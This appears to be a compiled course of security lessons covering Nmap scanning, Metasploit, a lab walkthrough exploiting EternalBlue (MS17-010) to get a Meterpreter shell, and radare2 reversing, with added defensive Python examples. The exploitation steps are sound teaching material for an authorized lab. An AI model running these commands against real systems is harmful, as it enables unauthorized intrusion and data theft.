Types of hackers
- A hacker is a person who finds and exploits weaknesses in computer systems and/or networks to gain access. Hackers are usually skilled computer programmers with knowledge of computer security.
- Ethical hacker (white hat): A hacker who gains access to systems with a view to fixing the identified weaknesses.
- Cracker (black hat): A hacker who gains unauthorized access to computer systems for personal gain. The intent is usually to steal corporate data, violate privacy rights, transfer funds from bank accounts, etc.
- Grey hat: A hacker who is in between ethical and black hat hackers. He/she breaks into computer systems without authority with a view to identifying weaknesses and revealing them to the system owner.
- Script kiddies: Non-skilled people who gain access to computer systems using ready-made tools.
#intermediate
Getting started with Nmap
Nmap is the world's leading port scanner. Used as an online port scanner, it can scan your perimeter network devices and servers from an external perspective, i.e. from outside your firewall.
Installing Nmap on Debian | Ubuntu
Open terminal & type command:
sudo apt-get install nmap
It will start installing Nmap.
Once the installation is finished, we can verify the installed version of Nmap using:
nmap --version
Installing Nmap on Windows
Download Nmap
Link to download: nmap-7.80-setup.exe
Run the downloaded .exe file.
In the window that opens, accept the License terms & click Next.
Select the install location & click Install.
#intermediate
Port Scanning with Nmap
Part - 1
TCP SYN Scan
SYN scan is the default and most popular scan option, for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy, since it never completes TCP connections.
Command: nmap -sS target
TCP Connect Scan
TCP connect scan is the default TCP scan type when SYN scan is not an option. This is the case when a user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call.
Command: nmap -sT target
Note: target is the IP address or hostname of the victim machine.
Difference between Nmap TCP SYN Scan and TCP Connect Scan
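As an added illustration (not part of the original lesson), here is a small Python detector run over a constructed packet summary. It shows the difference from the defender's side: a SYN scan leaves half-open probes (SYN, SYN/ACK, then RST) that only appear in packet captures or firewall logs, while a connect scan completes the handshake and is therefore also recorded by the listening application. All addresses, ports and the packet record format are constructed for this example.

```python
from collections import defaultdict

# Constructed packet summaries (not real captures): (sender, receiver, server_port, tcp_flags).
# Flags: S = SYN, SA = SYN/ACK, RA = RST/ACK (closed port), A = ACK, FA = FIN/ACK, R = RST.
OPEN_PORTS = {22, 80, 445}
PROBED_PORTS = [21, 22, 25, 80, 443, 445, 3389]


def syn_probe(client, server, port):
    """Half-open probe as nmap -sS sends it: SYN, reply, then RST instead of completing the handshake."""
    if port in OPEN_PORTS:
        return [(client, server, port, "S"), (server, client, port, "SA"), (client, server, port, "R")]
    return [(client, server, port, "S"), (server, client, port, "RA")]


def connect_probe(client, server, port):
    """Full connect() probe as nmap -sT sends it: the handshake completes, so the server application sees it."""
    if port in OPEN_PORTS:
        return [(client, server, port, "S"), (server, client, port, "SA"),
                (client, server, port, "A"), (client, server, port, "FA")]
    return [(client, server, port, "S"), (server, client, port, "RA")]


def build_sample_capture():
    """Two constructed scanners against one server: 10.0.0.5 runs a SYN scan, 10.0.0.7 a connect scan."""
    packets = []
    for port in PROBED_PORTS:
        packets += syn_probe("10.0.0.5", "10.0.0.20", port)
        packets += connect_probe("10.0.0.7", "10.0.0.20", port)
    return packets


def classify_probes(packets):
    """Reconstruct each (client, server, port) exchange and record how far the handshake got."""
    events = defaultdict(set)
    for sender, receiver, port, flags in packets:
        if flags in ("SA", "RA"):             # server reply: key on the client that sent the SYN
            events[(receiver, sender, port)].add("open" if flags == "SA" else "closed")
        elif flags == "S":
            events[(sender, receiver, port)].add("syn")
        elif flags in ("A", "FA"):            # the client completed the handshake
            events[(sender, receiver, port)].add("ack")
        elif flags == "R":
            events[(sender, receiver, port)].add("rst")
    per_pair = defaultdict(lambda: {"half_open": 0, "completed": 0, "closed": 0})
    for (client, server, port), seen in events.items():
        if "ack" in seen:
            per_pair[(client, server)]["completed"] += 1
        elif "closed" in seen:
            per_pair[(client, server)]["closed"] += 1
        elif {"open", "rst"} <= seen:
            per_pair[(client, server)]["half_open"] += 1
    return per_pair


def find_scanners(packets, port_threshold=5):
    """Flag sources that probed many ports on one host and say which logs would have recorded them."""
    findings = []
    for (client, server), c in sorted(classify_probes(packets).items()):
        probed = c["half_open"] + c["completed"] + c["closed"]
        if probed < port_threshold:
            continue
        if c["half_open"] and not c["completed"]:
            kind, visibility = "SYN (half-open) scan", "packet capture or firewall logs only"
        else:
            kind, visibility = "TCP connect scan", "packet/firewall logs and the target's application logs"
        findings.append({"scanner": client, "target": server, "ports_probed": probed,
                         "open_ports_found": c["half_open"] + c["completed"],
                         "kind": kind, "visible_in": visibility})
    return findings


if __name__ == "__main__":
    for finding in find_scanners(build_sample_capture()):
        print(finding)
```

The threshold of five distinct ports from one source is the only tuning knob; on a real network it is the number of ports a legitimate client would touch on a single host before you would want an alert.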
#intermediate
Port Scanning with Nmap
Part - 2
UDP Scans
While most popular services on the Internet run over the TCP protocol, UDP services are widely deployed. DNS, SNMP, and DHCP (registered ports 53, 161/162, and 67/68) are three of the most common. Because UDP scanning is generally slower and more difficult than TCP, some security auditors ignore these ports. This is a mistake, as exploitable UDP services are quite common and attackers certainly don’t ignore the whole protocol.
Command: nmap -sU target
#intermediate
Getting started with Metasploit
Metasploit Framework is a collection of exploits, shellcodes, fuzzing tools, payloads, encoders etc. It is an open-source penetration testing platform that enables you to find and exploit vulnerabilities.
Metasploit Framework comes in a variety of interfaces:
msfconsole • msfcli • msfgui • Armitage
• Modules
Exploit - An exploit is a method by which the attacker takes advantage of a flaw within a system, service, application etc.
Payload - A payload is the piece of code which is run in the successfully exploited system.
Auxiliary - Provides additional functionality like fuzzing, scanning, recon, dos attack etc.
Encoders - Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall. This is widely used when we create a backdoor.
Shellcode - Shellcode is a set of instructions used as a payload when exploitation occurs. It is typically written in assembly language.
#intermediate
Install Metasploit-Framework on Debian | Ubuntu
1. Install postgresql
sudo apt-get install postgresql
2. Install metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
3. Now we have it installed. Run Metasploit using the commands:
sudo service postgresql start
sudo msfconsole
Install Metasploit-Framework on Windows
1. Download installer: Link
2. Run the downloaded installer
3. Click "Next" & accept the license agreement
4. Click "Install" & Done.
• Running metasploit
Open cmd & navigate to the folder where Metasploit is installed
Type "msfconsole" & hit enter
#intermediate
Metasploit architecture
Metasploit is provided in the metasploit-framework package & is installed in /usr/share/metasploit-framework directory
Metasploit Filesystem
The msf filesystem is laid out in an intuitive manner and is organized by directory
data • documentation • lib • modules • plugins • scripts • tools
The data directory contains editable files used by Metasploit to store binaries required for certain exploits, wordlists, images, and more
The documentation directory contains the available documentation for the framework
The lib directory contains the 'meat' of the framework code base
The modules directory is where you will find the actual msf modules for exploits, auxiliary and post modules, payloads, encoders, and nop generators
The scripts directory contains Meterpreter and other scripts
Introduction to EternalBlue & WannaCry Ransomware
We'll learn how to exploit this vulnerability in the #advanced section.
In 2017, the US National Security Agency (NSA) found a vulnerability in the SMBv1 protocol. It allowed an attacker to execute their code without the user noticing anything. When one device got infected, the hacker could gain access to the whole network and every device connected to it.
This exploit was called EternalBlue. A hacker group called the Shadow Brokers allegedly stole it from the NSA and leaked it online in 2017. Microsoft released an update to patch the vulnerability, but only a month after that, the WannaCry ransomware broke out. This massive attack affected almost 200,000 Windows devices across 150 countries. It encrypted all data on the victim's computer and demanded a ransom in Bitcoin. EternalBlue exploits 3 Windows bugs to achieve remote code execution:
Wrong Casting Bug • Wrong Parsing Function Bug • Non-paged Pool Allocation Bug
#beginner
Today we're starting the #advanced section. We'll go through every step of the process to hack into our first machine. After we finish, the next day, the machine will be live. Its IP and the time to practice will be published. Before we start, here's a quick run-through of our terms & conditions.
#rules
Users are only authorized to hack machines that have been deployed & not any other device on the same network.
Users must not distribute any malicious material to other users, such as malware, through the upload functionality or through any other means.
Users must abstain from any unlawful, inappropriate and abusive use of the content and the services provided on this server at all times, in accordance with the existing legislation, and respect intellectual property rights.
Users are not allowed to target or attack other users.
Let's have some fun
#advanced
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-1] Connect to our network
sudo openvpn <openvpn-config-path>
The above step is important; otherwise you won't be able to access any machines. In the real world this is the same as being connected to the same Wi-Fi as the target device.
#advanced
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-2] Scanning for open ports
nmap -sV -A <machine-ip>
Explanation
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
[Result Analysis]
The machine has port 445 open, which means it may be vulnerable to EternalBlue.
#advanced
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-3] Scanning for ms17-010
nmap -p445 --script smb-vuln-ms17-010 <machine-ip>
Explanation
In the command above we used nmap with the NSE script "smb-vuln-ms17-010" to identify devices affected by the MS17-010 vulnerability.
-p445: the port that we want to scan. Here we only scan port 445, which is the SMB file-sharing port.
[Result Analysis]
State: VULNERABLE indicates that the machine is vulnerable to EternalBlue.
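For a defender who runs the same scan against their own subnet, the result has to be turned into a patch list. The following Python triage script is an added example, not part of the original lesson: it parses a constructed excerpt of nmap's normal output (addresses are from the 192.0.2.0/24 documentation range, and the script block is reproduced only as far as the "State: VULNERABLE" line the lesson relies on) and generalises the single-machine result above to several hosts, each ending up with one action for the patch queue.

```python
import re

# Constructed excerpt of nmap normal output (not a real scan). Addresses come from the
# 192.0.2.0/24 documentation range; the script block is reproduced only as far as the State line.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.0.2.10
Host is up (0.040s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    Risk factor: HIGH

Nmap scan report for 192.0.2.11
Host is up (0.012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 192.0.2.12
Host is up (0.030s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\S+)")
STATE_RE = re.compile(r"^\|_?\s+State:\s+(\S+)")


def parse_nmap_output(text):
    """Collect, per host, the state of port 445 and the State line of the ms17-010 script."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                                  # a new "Nmap scan report for ..." block starts
            current = hosts.setdefault(m.group(1), {"port_445": "unknown", "ms17_010": "no result"})
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m and m.group(1) == "445":
            current["port_445"] = m.group(2)
            continue
        m = STATE_RE.match(line)
        if m:
            current["ms17_010"] = m.group(1)
    return hosts


def triage(hosts):
    """Turn the parsed results into one action per host for the patch queue."""
    actions = {}
    for host, info in hosts.items():
        if info["ms17_010"] == "VULNERABLE":
            actions[host] = "PATCH NOW: MS17-010 update missing and SMB reachable; isolate until patched"
        elif info["port_445"] == "open":
            actions[host] = "VERIFY: SMB exposed but the script gave no result; confirm patch level, disable SMBv1"
        else:
            actions[host] = "OK: SMB not reachable from the scanner"
    return actions


def patch_queue(text):
    """Hosts ordered by urgency, which is what an admin would hand to the ticketing system."""
    actions = triage(parse_nmap_output(text))
    rank = {"PATCH NOW": 0, "VERIFY": 1, "OK": 2}
    return sorted(actions, key=lambda host: rank[actions[host].split(":")[0]])


if __name__ == "__main__":
    for host, action in triage(parse_nmap_output(SAMPLE_NMAP_OUTPUT)).items():
        print(f"{host:12} {action}")
```

A host with port 445 open but no script result is deliberately not marked as safe: the NSE script only reports positive findings, so silence means "check by other means", not "patched".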
#advanced
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-4] Run metasploit & search for eternal-blue exploit
msfconsole
search ms17-010
Explanation
msfconsole is used to start Metasploit
search ms17-010 returns all available exploits for EternalBlue
#advanced
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-5] Use eternal-blue exploit
use exploit/windows/smb/ms17_010_eternalblue
Explanation
The 'use' command selects the module that we want to use
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-6] Set remote host
set RHOSTS <machine-ip>
Explanation
'RHOSTS' is the remote host IP. It should be set to the IP of the victim machine that we are going to attack. In my case it is 10.10.34.99. For you, it will be the IP of the live machine or any other vulnerable machine that you want to exploit.
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-7] Finding out LHOST
ifconfig
Explanation
Execute the 'ifconfig' command in a new terminal to find your LHOST. If you're on Windows, use 'ipconfig' in cmd. The IP corresponding to inet on the tun0 interface is the LHOST. For me it is 10.6.9.212.
Here we use the tun0 interface because we're connected to the same network as the target device via the OpenVPN tunnel. In a real-world attack you would use the wlo1 or Ethernet interface when connected to Wi-Fi or a LAN respectively.
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-8] Set localhost in metasploit
set LHOST <your-public-ip>
Explanation
LHOST is used to start a listener on a specific interface of your machine.
Machine-1: Blue
Vulnerability: MS17-010 • Eternal Blue
Security Level: Low
[Step-9] Exploit
exploit
Explanation
We use the 'exploit' or 'run' command to launch the exploit.
[Result Analysis]
After executing the exploit, if we see 'WIN' it means we successfully exploited the machine and we should have a meterpreter shell open. Sometimes this exploit fails even if everything is done properly. Don't worry about that; Metasploit takes care of it and automatically runs the exploit again. If it still can't exploit the machine, you're missing something and you should instead read more about the EternalBlue exploit.
[Troubleshoot] If you see 'FAIL'
Make sure your device and the victim PC are on the same network.
EternalBlue works only for Windows versions up to Windows 7. There's an exploit for Windows 8 as well, but most of the time it doesn't work.
Cross-check the LHOST and RHOSTS values.
Port 4444 should not be in use by some other application or process.
Congratulations!
You just learned the EternalBlue exploit. Tomorrow the machine will be online for practice & the IP address will be given 10 minutes before time. For the time and other details see below.
Time: 4:00 pm-5:00 pm IST
[Target Info] Machine-1
OS: Windows 7
Vulnerability: MS17-010 • Eternal Blue
Exploitation method: Easy
[Requirements]
Nmap • Metasploit • OpenVPN • OpenVPN Config • Brain
[IP Address]
Will be published tomorrow at the given time. The target machine will be accessible at that IP for exactly 1 hour from the given time. Read #rules before you start.
Date: 1 August 2020; the challenge starts at 4:00 pm IST.
#beginner
Introduction to meterpreter
Meterpreter is a metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.
Meterpreter is deployed using in-memory DLL injection. As a result, it resides entirely in memory and writes nothing to disk. No new processes are created as it injects itself into the compromised process, from which it can migrate to other running processes. As a result, the forensic footprint of an attack is very limited.
Meterpreter basic commands [Part-1]
background
The background command sends the current meterpreter session to the background. To interact with the session again, execute sessions -i <session-id>
download
The download command downloads a file from the remote machine.
edit
The edit command opens a file located on the target host using 'vim'.
getuid
Running getuid will display the user that the meterpreter server is running as on the host.
#beginners
Introduction to Reverse engineering
Reverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, code or to extract knowledge from the object; similar to scientific research, the only difference being that scientific research is about a natural phenomenon.
Machine codes
Computers execute machine code, which is encoded as bytes, to carry out tasks on a computer. Since different computers have different processors, the machine code executed on these computers is specific to the processor.
#beginners
Assembly and radare2
Machine code is usually represented in a more readable form called assembly code. Machine code is usually produced by a compiler, which takes the source code of a file and, after going through some intermediate stages, produces machine code that can be executed by a computer.
The best way to actually start explaining assembly is by diving in. We’ll be using radare2 to do this - Radare2 (also known as r2) is a complete framework for reverse-engineering and analyzing binaries; composed of a set of small utilities that can be used together or independently from the command line.
Installation
sudo apt-get install -y radare2
#advanced
Reversing with radare2
[Step-1] Running the binary
Download run from here & execute
Command: ./run
After executing the program, we see that there are 3 variables (a, b, c), where c is the sum of a and b.
[Step-2] Open file in debug mode
Command: r2 -d ./run
This will open the binary in debugging mode.
[Step-3] Analyzing run
Once the binary is open, one of the first things to do is ask radare2 to analyze the program, and this can be done by typing in: aa
It analyses all symbols and entry points in the executable.
[Step-4] List all functions
Once the analysis is complete, you would want to know where to start analysing from - most programs have an entry point defined as main. To list all the functions run: afl
Command: afl | grep main
Here we're using grep to filter the results containing main.
#intermediate
Introduction to Assembly Language & Registers
An assembly language is a low level programming language designed for a specific type of processor. The core of assembly language involves using registers to do the following:
[1] Transfer data between memory and register, and vice versa
[2] Perform arithmetic operations on registers and data
[3] Transfer control to other parts of the program
The registers store data elements for processing without having to access the memory.
64 bit • %rax | %rbx | %rcx | %rdx | %rsi | %rdi | %rsp | %rbp
32 bit • %eax | %ebx | %ecx | %edx | %esi | %edi | %esp | %ebp
The first six registers are known as general purpose registers while %rsp and %rbp are special purpose and their meaning will be explained later on.
#intermediate
Opcodes & Assembly Instructions
Each assembly language statement is split into an opcode and an operand. The opcode is the instruction that is executed by the CPU and the operand is the data or memory location used to execute that instruction.
To move data between registers and memory, the following instruction is used:
movq source, destination
This covers:
Transferring constants (which are prefixed with the $ operator), e.g. movq $3, %rax moves the constant 3 into the register %rax
Transferring values from a register, e.g. movq %rax, %rbx moves the value of %rax into %rbx
Transferring values to or from memory, shown by putting a register inside parentheses, e.g. movq %rax, (%rbx) moves the value stored in %rax to the memory location whose address is held in %rbx.
The last letter of the mov instruction represents the size of the data:
Data type                Size (bytes)   Suffix
Byte                     1              b
Word                     2              w
Double word              4              l
Quad word                8              q
Single precision         4              s
Double precision         8              l
#intermediate
Some Important Instructions in Assembly Language
[1] leaq source, destination
this instruction sets destination to the address denoted by the expression in source
[2] addq source, destination
destination = destination + source
[3] subq source, destination
destination = destination - source
[4] imulq source, destination
destination = destination * source
[5] salq source, destination
destination = destination << source where << is the left bit shifting operator
[6] sarq source, destination
destination = destination >> source where >> is the right bit shifting operator
[7] xorq source, destination
destination = destination XOR source
[8] andq source, destination
destination = destination & source
[9] orq source, destination
destination = destination | source
#advanced
Step-5 Walkthrough & explanation
Now that we know some basic assembly, let's jump back to step-5 and walk through the code to see what the instructions mean when combined.
The line starting with sym.main indicates that we’re looking at the main function. The next 3 lines (box-1) are used to represent the variables stored in the function. The column (a) indicates that they are integers, column (b) specifies the name that radare2 uses to reference them and column (c) shows the actual memory location.
The next 3 instructions (box-2) are used to allocate space on the stack. This ensures that there’s enough room for variables to be allocated.
#advanced
Introduction to Breakpoints
A more efficient and practical way to analyse the program is to do so while it runs. And the best way to do this is using breakpoints.
A breakpoint specifies where the program should stop executing. This is useful as it allows us to look at the state of the program at that particular point.
[Step-6] Setting breakpoints
Now let’s set a breakpoint using the command
db address
In this case, we want to set breakpoint at mov dword [local_ch], 4 and the memory address corresponding to this instruction is 0x00400b55
db 0x00400b55
Now that we’ve set a breakpoint, let’s run the program using
dc
Running dc will execute the program until we hit the breakpoint.
#advanced
Instruction pointers & the little b
Command - pdf
Once we hit the breakpoint, we can use this command instead of pdf @main to directly print out the main function.
The rip (see box-1) which is the current instruction shows where execution has stopped. The little b marked as box-2 represents the breakpoint.
We know that the mov instruction is used to transfer values. The statement (box-3) transfers the value 4 into the variable (local_ch). Note that currently the instruction pointer (rip) is at the memory address we specified, i.e. the code in box-3 hasn't executed yet and the value of the variable should still be empty
#advanced
[Step-7] Printing contents of a variable
To view the contents of the variable (local_ch), we use the following command
px @memory-address
In this case, the corresponding memory address for local_ch is rbp-0xc (from the first few lines of pdf @main)
This command prints the memory contents in hex
px @rbp-0xc
This shows that the variable currently doesn’t have anything stored in it - it’s just 0000 (row 1 - column 0).
#advanced
[Step-8] ds - step to next instruction
Let's execute this instruction (i.e. mov dword [local_ch], 4) and move to the next one using the following command (which executes exactly one instruction)
ds
If we view the memory location after running this command, we get the output shown above (screenshot)
We can see that the first 2 bytes (row 1 - column 0) now hold the value 4.
#advanced
[Step-9] Step to next instruction ~ mov dword [local_8h], 5
In this step, we're doing two things - (a) ds - the command to step to the next instruction, (b) px @rbp-0x8 - the command to view the contents of the variable (local_8h)
Remember rip, the instruction pointer?
The instruction pointer register (rip) points to the next instruction to execute. In the previous screenshot (click), rip is at the instruction mov dword [local_ch], 4
This means that when we use the command "ds", the instruction mov dword [local_ch], 4 should be executed
However, we have already executed the command "ds" once in Step-8 (here)
... (continued)
#advanced
[Step-9] ds and px @rbp-0x8 explained
... continued from here
Hence our "ds" command in Step-9 (see screenshot) actually executes the instruction after mov dword [local_ch], 4, which is mov dword [local_8h], 5, as seen in the screenshot (box-3)
When mov dword [local_8h], 5 is executed using "ds", the constant "5" is stored in the variable "local_8h"
Let's examine the variable local_8h now using px @rbp-0x8 ~ screenshot (box-2)
Note: We use @rbp-0x8 with "px" (alias for print hexadecimal) because rbp-0x8 is the actual memory location of the variable local_8h
We can confirm that the value of "local_8h" is indeed "5", see screenshot (box-3)
#advanced
[Step-10] pdf once again
Let's print the disassembly function using command "pdf"
Box-2 shows where our instruction pointer (rip) currently is, i.e. just after mov dword [local_8h], 5 (box-3), the instruction that we executed in the last step using "ds"
What if we run "ds" again?
Let's see
#advanced
[Step-11] dr[?]
The "dr" command prints the 'gpr' (general purpose) registers
We can also print the value of a specific register using dr <register>
In the above screenshot, we run "ds" (box-1) again and it executes the next instruction, mov edx, dword [local_ch] (box-3)
What does "mov edx, dword [local_ch]" do?
The value of the variable local_ch is moved into the edx register
We know from here (click) that local_ch is "4", and hence after "ds" executes, edx becomes "4" as well
After running the next command "dr", we can see that ¹rdx is indeed "4" (0x00000004) ~ see above screenshot
¹Note: edx is the low 32 bit of the rdx register, which is a 64 bit register
#advanced
[Step-12] step read repeat
1. Step to next instruction
Let's step to the next instruction "mov eax, dword [local_8h]" with "ds" ("local_8h", i.e. "5", is moved into eax)
2. Read general purpose registers
Print the gprs using "dr" and confirm that the value of rax is indeed "5" (0x00000005)
3. Repeat steps 1 and 2
Running "ds" once again should now execute "add eax, edx", which adds rax "5" and rdx "4" and stores the sum in rax
Using "dr", we can see rax is "9" (0x00000009), as expected
4. End
Before executing the next instruction "mov dword [local_4h], eax", print the variable "local_4h" using "px @rbp-0x4"
We get "00"
The next instruction is "mov dword [local_4h], eax"
Execute it using "ds" and run "px @rbp-0x4" again; we get "09", as expected since the value of rax was 0x00000009
#advanced
[Step-13] "end" ?
Recall that the binary is actually a program that adds up two variables "a" and "b" and stores the result in another variable "c", where "a" and "b" are the constants "4" and "5" respectively.
Explanation
To get an insight into the actual program structure, we reversed "run" using radare2
Source code breakdown
Integer a "local_ch" is declared
"var int local_ch @ rbp-0xc"
Similarly, variables b "local_8h" and c "local_4h" are declared
Variable a is assigned the constant 4 ("mov dword [local_ch], 4") and b is assigned the constant "5"
To add them together, the program utilises the unused registers "eax" and "edx"
Variables a and b are added via edx and eax respectively ("add eax, edx"), and the result is then assigned to variable c "local_4h" ("mov dword [local_4h], eax")
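To tie the register, mov and instruction sections together with the debugging walkthrough, here is an added Python example (not radare2 and not the lesson's "run" binary) that simulates the handful of x86-64 instructions used above, including the 32-bit/64-bit register aliasing from the note on edx and rdx, and replays the db / dc / ds / dr / px session of steps 6 to 12. Only the address 0x00400b55 comes from the lesson; the prologue stand-in, the other instruction addresses and the stack base address are assumed.

```python
"""Constructed x86-64 subset simulator for the lesson's 'run' walkthrough (illustration only, not radare2).
Operands: ("imm", n), ("reg", name) or ("mem", base_register, offset), the last meaning dword [base+offset]."""

MASK32, MASK64 = 0xFFFFFFFF, 0xFFFFFFFFFFFFFFFF
# A 32-bit register is the low half of its 64-bit parent (edx is the low 32 bits of rdx).
ALIAS32 = {"eax": "rax", "ebx": "rbx", "ecx": "rcx", "edx": "rdx",
           "esi": "rsi", "edi": "rdi", "esp": "rsp", "ebp": "rbp"}
# destination = f(destination, source), as in the lesson's instruction list; sar and lea are special-cased
ALU = {"mov": lambda d, s: s, "add": lambda d, s: d + s, "sub": lambda d, s: d - s,
       "imul": lambda d, s: d * s, "sal": lambda d, s: d << s, "xor": lambda d, s: d ^ s,
       "and": lambda d, s: d & s, "or": lambda d, s: d | s}


class CPU:
    def __init__(self, program, frame_base=0x7FFFFFFFE000):   # frame_base: assumed stack address
        self.program = {addr: (op, dst, src) for addr, op, dst, src in program}
        self.order = [addr for addr, *_ in program]
        self.regs = {r: 0 for r in ALIAS32.values()}
        self.regs["rbp"] = self.regs["rsp"] = frame_base
        self.mem = {}                       # byte address -> byte; untouched bytes read as 0
        self.rip = self.order[0]
        self.breakpoints = set()

    def _addr(self, operand):
        return (self.regs[operand[1]] + operand[2]) & MASK64

    def read(self, operand):
        kind, name = operand[0], operand[1]
        if kind == "imm":
            return name
        if kind == "reg":
            return self.regs[ALIAS32[name]] & MASK32 if name in ALIAS32 else self.regs[name]
        base = self._addr(operand)
        return int.from_bytes(bytes(self.mem.get(base + i, 0) for i in range(4)), "little")

    def write(self, operand, value):
        if operand[0] == "reg":             # a 32-bit write zero-extends into the 64-bit parent
            parent, mask = (ALIAS32[operand[1]], MASK32) if operand[1] in ALIAS32 else (operand[1], MASK64)
            self.regs[parent] = value & mask
        else:
            base = self._addr(operand)
            for i, byte in enumerate((value & MASK32).to_bytes(4, "little")):
                self.mem[base + i] = byte

    def db(self, address):                  # db <addr>: set a breakpoint
        self.breakpoints.add(address)

    def ds(self):                           # ds: execute the instruction at rip, then advance rip
        op, dst, src = self.program[self.rip]
        d, s = self.read(dst), self.read(src)
        if op == "lea":
            result = self._addr(src)        # the address itself, not the value stored there
        elif op == "sar":                   # arithmetic shift: keeps the sign of the destination
            bits = 32 if dst[0] == "mem" or dst[1] in ALIAS32 else 64
            result = (d - (1 << bits) if d >> (bits - 1) else d) >> s
        else:
            result = ALU[op](d, s)
        self.write(dst, result)
        nxt = self.order.index(self.rip) + 1
        self.rip = self.order[nxt] if nxt < len(self.order) else None

    def dc(self):                           # dc: run until rip is at a breakpoint (not yet executed)
        first = True
        while self.rip is not None and (first or self.rip not in self.breakpoints):
            first = False
            self.ds()

    def dr(self, reg):                      # dr <reg>: value of a 64-bit register
        return self.regs[reg]

    def px(self, base, offset):             # px @base+offset: the dword there (r2 prints 9 as 09 00 00 00)
        return self.read(("mem", base, offset))


# The lesson's main(): 0x00400b55 is from the lesson; the prologue stand-in and other addresses are assumed.
LESSON_PROGRAM = [
    (0x00400b51, "sub", ("reg", "rsp"), ("imm", 0x10)),          # stack space for the locals (box-2)
    (0x00400b55, "mov", ("mem", "rbp", -0xc), ("imm", 4)),       # mov dword [local_ch], 4    a = 4
    (0x00400b5c, "mov", ("mem", "rbp", -0x8), ("imm", 5)),       # mov dword [local_8h], 5    b = 5
    (0x00400b63, "mov", ("reg", "edx"), ("mem", "rbp", -0xc)),   # mov edx, dword [local_ch]
    (0x00400b66, "mov", ("reg", "eax"), ("mem", "rbp", -0x8)),   # mov eax, dword [local_8h]
    (0x00400b69, "add", ("reg", "eax"), ("reg", "edx")),         # add eax, edx
    (0x00400b6b, "mov", ("mem", "rbp", -0x4), ("reg", "eax")),   # mov dword [local_4h], eax  c = a + b
]


def walkthrough():
    cpu = CPU(LESSON_PROGRAM)
    cpu.db(0x00400b55)                                             # [Step-6]
    cpu.dc()
    seen = {"rip_at_break": cpu.rip, "local_ch_before": cpu.px("rbp", -0xc)}   # [Step-7]: still 0

    def step(key, look):                                           # ds, then observe one value
        cpu.ds()
        seen[key] = look()
    step("local_ch_after", lambda: cpu.px("rbp", -0xc))            # [Step-8]: 4
    step("local_8h", lambda: cpu.px("rbp", -0x8))                  # [Step-9]: 5
    step("rdx", lambda: cpu.dr("rdx"))                             # [Step-11]: 4
    step("rax_loaded", lambda: cpu.dr("rax"))                      # [Step-12]: 5
    step("rax_sum", lambda: cpu.dr("rax"))                         # add eax, edx: 9
    seen["local_4h_before"] = cpu.px("rbp", -0x4)                  # 0, read before the final mov runs
    step("local_4h_after", lambda: cpu.px("rbp", -0x4))            # 9
    return seen
```

Calling walkthrough() reproduces every value the lesson read off the screenshots, and the same CPU can run a small program of its own to check the other instructions (sar on a negative dword, lea of a stack slot) without a debugger attached.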
THE END